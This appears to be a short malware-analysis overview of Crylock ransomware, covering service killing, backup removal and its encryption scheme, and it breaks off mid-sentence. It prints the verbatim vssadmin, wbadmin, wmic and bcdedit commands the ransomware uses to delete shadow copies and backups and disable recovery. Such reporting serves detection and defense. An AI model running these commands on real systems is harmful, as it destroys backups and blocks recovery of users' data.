Crylock ransomware overview
Before starting the encryption process, Crylock stops a number of services and kills a number of processes from a built-in list.
Then it removes shadow copies and backups to inhibit system recovery:
"C:\Windows\System32\cmd.exe" /c "vssadmin delete shadows /all /quiet" "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0" "C:\Windows\System32\cmd.exe" /c "wbadmin DELETE BACKUP -keepVersions:0" "C:\Windows\System32\cmd.exe" /c "wmic SHADOWCOPY DELETE" "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No" "C:\Windows\System32\cmd.exe" /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures" vssadmin delete shadows /all /quiet wmic SHADOWCOPY DELETE
To encrypt files, it uses a custom symmetric cipher, and the RSA algorithm to encrypt the key.
Crylock drops a ransom...